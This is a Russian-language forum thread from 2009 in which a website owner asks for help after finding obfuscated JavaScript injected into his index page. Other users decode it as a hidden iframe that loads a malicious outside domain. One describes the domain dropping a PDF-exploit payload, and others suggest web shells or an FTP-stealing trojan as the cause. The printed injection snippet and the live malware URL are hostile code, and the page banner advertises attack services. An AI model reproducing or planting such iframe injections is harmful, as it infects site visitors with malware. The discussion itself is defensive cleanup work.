Форум АНТИЧАТ - Вредоносный код на сайте!!!

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Вредоносный код на сайте!!!

Страница 1 из 4

Опции темы

Поиск в этой теме

Опции просмотра

Вредоносный код на сайте!!!

15.06.2009, 13:32

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Отправить сообщение для mff с помощью ICQ

Вредоносный код на сайте!!!

Добрый день, дорогие форумчане!

Вобщем вот такая произошла у меня ситуация, захожу с утра на сайт, а там ошибка. Ни кто ничего не трогал, всё работало, хостер надёжный. Полез по ftp, в индексе вот такую заразу вырезал:

Код HTML:

<script language="javascript">
document.write(unescape(' %3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%75%62%61%35%2E%63%6E%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E '));
</script>

Такая же вата была, когда я работал в студии Веб дизайна. Я чистил каждый день сайты.
В корне, во всех файлах, был добавлен подобный код. С утра приходишь - то же самое.
Что они только не делали, и меняли ftp клиента и виндовс и по 3 антивиря на машину - ни чего не помогало.
Прошу вашей помощи, помогите разобраться, что, к чему.

Спасибо!

15.06.2009, 13:36

diehard

Постоянный

Регистрация: 30.09.2007

Сообщений: 815

Провел на форуме:
2590715

Репутация: 659

Отправить сообщение для diehard с помощью ICQ

напиши УРЛ сайта, все из базы удалят

15.06.2009, 13:37

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Скорее всего вирус локальный (на твоем домашнем компе, или откуда ты там по фтп заходишь). А вообще вариантов миллиард и еще один

15.06.2009, 13:38

ph1l1ster

Постоянный

Регистрация: 11.03.2008

Сообщений: 347

Провел на форуме:
2075230

Репутация: 462

Отправить сообщение для ph1l1ster с помощью ICQ

Код:

<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>

хорошо чистиш? ищи шеллы, меня пассы, или на компе у тебя локальный трой

15.06.2009, 18:05

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Пару троев грохнул! Пасы сменил.

15.06.2009, 18:41

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Может в каком-нить файле шелл просто?

15.06.2009, 18:59

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Tigger, можиет, но как узнать?

15.06.2009, 19:06

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Проверяй каждый файл на наличие вредоносного кода.

15.06.2009, 19:15

POS_troi

Познавший АНТИЧАТ

Регистрация: 01.12.2006

Сообщений: 1,769

Провел на форуме:
3718311

Репутация: 1118

Отправить сообщение для POS_troi с помощью ICQ

Цитата:

можиет, но как узнать?

для начала с автора нужно вытащить инфу о версии двига =)

#10

15.06.2009, 19:19

Dobby007

Познающий

Регистрация: 07.09.2008

Сообщений: 55

Провел на форуме:
163517

Репутация: 57

Отправить сообщение для Dobby007 с помощью ICQ

То что это шелл - врятли...
Это скорее троянчик... причем недавно сделаннный...

Код:

<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>

Открыл я этот сайт... Вот че получается. ПРи зарузке ентого сайтика грузится PDF документ прямо в браузере. Затем этот PDF документ каким-то образом загружает на комп основную вирусяку e.exe, которая сохраняется в папке C:\Documents and Settings\{USER}\Local Settings\Temp и опять же как-то запускает ее (КАК!?). Вот отчеты по e.exe:

Код:

http://www.virustotal.com/ru/analisis/0f51e07788d3f945d6b94b83c03d83c136a287ad9545c07ae58aa1d152fa8c1b-1245078728

Это лично у меня так было. Можете конечно сами попробывать, если хотите.
Когда открыл сайт подумал вначале, что хрень какая-та (PDF документа как такогого там нет, просто грузится плагин PDF Reader'a в опере)... Так бы наверное он у меня и висел (ну всмысле вирусяка), если бы винда не выдала НЕ ОТПРАВЛЯТЬ по истечению какого-то времени

P.S. Так бы подумал что просто типо счетчик.... Кому-то надо посетителей нагонять, а здесь оказывается все круче =))

Последний раз редактировалось Dobby007; 15.06.2009 в 19:22..

Страница 1 из 4

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Хакеры научились помещать вредоносный код в BIOS	FraiDex	Мировые новости	3	30.03.2009 12:16
Ошибки Windows	dinar_007	Windows	19	01.07.2007 13:32
Коды состояния HTTP - Коды ошибок http сервера	D=P=CH= MOD=	*nix	6	15.10.2006 20:47
Вредоносный код может быть записан в Bios при помощи Acpi	dinar_007	Мировые новости	0	30.01.2006 16:52

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход